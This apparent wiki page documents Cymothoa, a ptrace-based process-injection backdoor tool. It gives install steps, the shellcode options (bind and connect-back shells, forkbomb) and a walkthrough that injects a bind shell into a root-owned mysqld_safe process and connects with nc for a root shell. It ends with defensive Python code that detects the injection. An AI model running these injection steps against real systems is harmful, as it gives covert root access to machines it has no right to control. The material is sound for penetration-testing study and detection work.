From aldeid

Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process: it attaches to the target with ptrace, writes the payload into one of the process's already-mapped executable regions, and resumes execution, so no new binary appears on disk and no new process is created.



Backtrack 5 R2 already ships with Cymothoa installed in /pentest/backdoors/cymothoa/.

From scratch

$ cd ~/src/
$ wget
$ tar xzvf cymothoa-1-beta.tar.gz
$ cd cymothoa-1-beta/
$ make
$ sudo make install



cymothoa -p <pid> -s <shellcode_number> [options]


Main options

  -p <pid>       process pid
  -s <number>    shellcode number
                   0  - bind /bin/sh to the provided port (requires -y)
                   1  - bind /bin/sh + fork() to the provided port (requires -y) - izik
                   2  - bind /bin/sh to tcp port with password authentication (requires -y -o)
                   3  - /bin/sh connect back (requires -x, -y)
                   4  - tcp socket proxy (requires -x -y -r) - Russell Sanford
                   5  - script execution (see the payload), creates a tmp file you must remove
                   6  - forks an HTTP Server on port tcp/8800
                   7  - serial port busybox binding
                   8  - forkbomb (just for fun...) - Kris Katterjohn
                   9  - open cd-rom loop (follows /dev/cdrom symlink)
                   10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs
                   11 - POC alarm() scheduled shellcode
                   12 - POC setitimer() scheduled shellcode
                   13 - alarm() backdoor (requires -j -y) bind port, fork on accept
                   14 - setitimer() tail follow (requires -k -x -y) send data via udp
  -m <name>      memory region name for shellcode injection (default /lib/ld)
                 search for "r-xp" permissions, see /proc/pid/maps...
  -n <name>      memory region name for persistent memory (default /lib/ld)
                 search for "rw-p" permissions, see /proc/pid/maps...
  -h             print this help screen
  -S             list available shellcodes

Injection options (overwrite payload flags)

  -f             fork parent process
  -F             don't fork parent process
  -b             create payload thread (probably you need also -F)
  -B             don't create payload thread
  -w             pass persistent memory address
  -W             don't pass persistent memory address
  -a             use alarm scheduler
  -A             don't use alarm scheduler
  -t             use setitimer scheduler
  -T             don't use setitimer scheduler

Payload arguments

  -j <seconds>   set timer (seconds)
  -k <usec>      set timer (microseconds)
  -x <ip>        set the IP
  -y <port>      set the port number
  -r <port>      set the port number 2
  -z <user>      set the username (4 bytes)
  -o <pass>      set the password (8 bytes)
  -c <script>    set the script code (ex: "#!/bin/sh\nls; exit 0")
                 escape codes will not be interpreted


First install cymothoa on the victim's computer. Then look up the process ID you want to infect (here the mysqld_safe wrapper shell, PID 1155, which runs as root):

victim:~/src/cymothoa-1-beta# ps aux | grep mysql
root      1155  0.0  0.1   1752   568 ?        S    21:39   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     1273  0.0  4.3 138744 22424 ?        Sl   21:39   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/ --socket=/var/run/mysqld/mysqld.sock --port=3306
root      1274  0.0  0.1   1676   560 ?        S    21:39   0:00 logger -t mysqld -p daemon.error
root     26975  0.0  0.1   3324   812 pts/0    S+   21:53   0:00 grep mysql

Then infect the process:

victim:~/src/cymothoa-1-beta# ./cymothoa -p 1155 -s 0 -y 6666
[+] attaching to process 1155

 register info: 
 eax value: 0xfffffe00	 ebx value: 0xffffffff
 esp value: 0xbfbfaffc	 eip value: 0xb7818424

[+] new esp: 0xbfbfaff8
[+] payload preamble: fork
[+] injecting code into 0xb7819000
[+] copy general purpose registers
[+] detaching from 1155

[+] infected!!!

On the attacker's machine, you should now be able to connect to port 6666. The shell inherits the privileges of the infected process, which is why injecting into the root-owned mysqld_safe wrapper yields a root shell here:

root@bt:/pentest/backdoors/cymothoa# nc 6666
uid=0(root) gid=0(root) groups=0(root)
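Because the payload is written over part of an existing executable mapping (by default the "r-xp" region whose name contains /lib/ld, as the -m option describes), the in-memory bytes of that mapping no longer match the library on disk. The following added example, which is not part of the original page or of the Cymothoa project, reproduces that region selection over a /proc/<pid>/maps listing and compares the mapped bytes with the backing file to spot such a modification; the maps excerpt is constructed (loosely modelled on the addresses in the injection output above), and the live check assumes root or ptrace access to /proc/<pid>/mem.

```python
import re

# /proc/<pid>/maps line layout: start-end perms offset dev inode [path]
MAPS_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) (\S{4}) ([0-9a-f]+) \S+ \d+\s*(.*)$")

# Constructed maps excerpt for a /bin/sh process (not real system output);
# the ld.so text mapping at 0xb7818000 mirrors the page's "injecting code
# into 0xb7819000" and eip 0xb7818424 values.
CONSTRUCTED_MAPS = """\
08048000-08062000 r-xp 00000000 08:01 1201 /bin/sh
b7818000-b7834000 r-xp 00000000 08:01 5678 /lib/ld-2.11.2.so
b7834000-b7835000 r--p 0001b000 08:01 5678 /lib/ld-2.11.2.so
b7835000-b7836000 rw-p 0001c000 08:01 5678 /lib/ld-2.11.2.so
bfbe0000-bfc02000 rw-p 00000000 00:00 0 [stack]
"""

def find_regions(maps_text, name="/lib/ld", perms="r-xp"):
    """Regions the -m/-n selection would match: (start, end, file_offset, path)."""
    out = []
    for line in maps_text.splitlines():
        m = MAPS_RE.match(line)
        if m and m.group(3) == perms and name in m.group(5):
            start, end, _, off, path = m.groups()
            out.append((int(start, 16), int(end, 16), int(off, 16), path))
    return out

def modified_addresses(mem_bytes, disk_bytes, start):
    """Absolute addresses where the mapped bytes differ from the backing file."""
    return [start + i for i, (a, b) in enumerate(zip(mem_bytes, disk_bytes)) if a != b]

def check_process(pid, name="/lib/ld"):
    """Live check: returns {path: first_modified_address} for each r-xp region
    of <name> whose memory no longer matches the file it was mapped from."""
    with open(f"/proc/{pid}/maps") as f:
        regions = find_regions(f.read(), name)
    findings = {}
    for start, end, off, path in regions:
        size = end - start
        with open(f"/proc/{pid}/mem", "rb") as mem:   # needs root / ptrace access
            mem.seek(start)
            mem_bytes = mem.read(size)
        with open(path, "rb") as disk:                 # same range of the on-disk library
            disk.seek(off)
            disk_bytes = disk.read(size)
        diffs = modified_addresses(mem_bytes, disk_bytes, start)
        if diffs:
            findings[path] = diffs[0]
    return findings

if __name__ == "__main__":
    import sys
    print(check_process(int(sys.argv[1])) or "no modified ld.so text found")
```

Text segments of shared libraries are mapped read-only from the file, so any byte difference inside an r-xp region is worth investigating; a process whose maps list no longer contains the expected library, or a mapping marked "(deleted)", deserves the same attention.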